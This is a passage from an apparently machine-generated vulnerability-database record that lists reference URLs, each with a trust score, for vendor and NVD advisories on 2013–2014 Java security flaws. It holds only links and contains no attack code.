"http://www.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 1.7, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 1.7, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 1.7, "url": "http://www.debian.org/security/2014/dsa-2912" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2014:0413" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58415" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59022" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59023" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59058" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59071" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59082" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59250" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59255" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59307" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59436" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59516" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59642" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59704" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59705" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59706" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60003" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60111" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60117" }, { "trust": 1.7, "url": "http://secunia.com/advisories/61264" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2187-1" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2191-1" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140852886808946\u0026w=2" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140852974709252\u0026w=2" }, { "trust": 1.6, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10698" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0446" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0429" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2412" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0451" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2398" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0460" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0453" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1876" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2414" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2421" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0457" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0458" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0452" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0461" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2427" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0456" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2403" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6629" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0455" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0454" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2402" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2423" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0459" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2401" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2397" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0449" }, { "trust": 0.4, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6954" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2409" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2413" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682740" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687642" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687297" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-009/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685689" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_apr2014_advisory.asc" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680565" }, { "trust": 0.3, "url": "https://www.suse.com/support/update/announcement/2014/suse-su-20140639-1.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21685350" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180008" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686718" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678048" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398943" }, { "trust": 0.3, "url": "\thttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398922" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681114" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#oracle_april_15_2014_cpu" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59550" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59555" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676860" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180257" }, { "trust": 0.3, "url": "asa-2014-203" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686717" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677072" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683527" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678218" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679524" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678544" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020989" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673013" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672047" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020184" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679187" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673576" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678883" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21664899" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675205" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2420" }, { "trust": 0.3, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0448" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0459.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2428" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2402.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2397.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.2, "url": "https://rhn.redhat.com/errata/rhsa-2014-0406.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0432" }, { "trust": 0.2, "url": "http://www.hp.com/java" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://www.hp.com/go/swa" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10698" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852886808946\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852974709252\u0026amp;w=2" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0486.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0448.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2413.html" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0455" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2409" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4266" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4219" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4209" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4263" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6468" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4247" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6511" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4265" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6504" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2402" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6527" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4227" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4252" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4244" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4262" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2490" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4208" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6492" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6512" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4264" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6466" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4288" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2483" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4223" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2428" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6502" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4268" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4218" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4220" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2413" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6515" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5887" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0878.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5910" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0982.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5878" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5907" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0376" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0368" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0428" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0422" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5884" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0423" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0410" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5898" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5889" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0424" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0416" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0373" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5888" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5899" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0403" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0375" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5896" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0387" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2403" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0461" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0452" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0455" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1876" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0456" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2397" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2421" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://blog.fuseyism.com/index.php/2014/04/16/security-icedtea-2-4-7-for-openjdk-7-released/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2413" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0453" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2402" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2412" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2414" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0460" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0429" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0454" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2423" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2427" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0458" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0451" }, { "trust": 0.1, "url": "http://advisories.mageia.org/mgasa-2014-0189.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0446" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0459" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0457" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2398" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4218" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4209" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0509.html" }, { "trust": 0.1, "url": 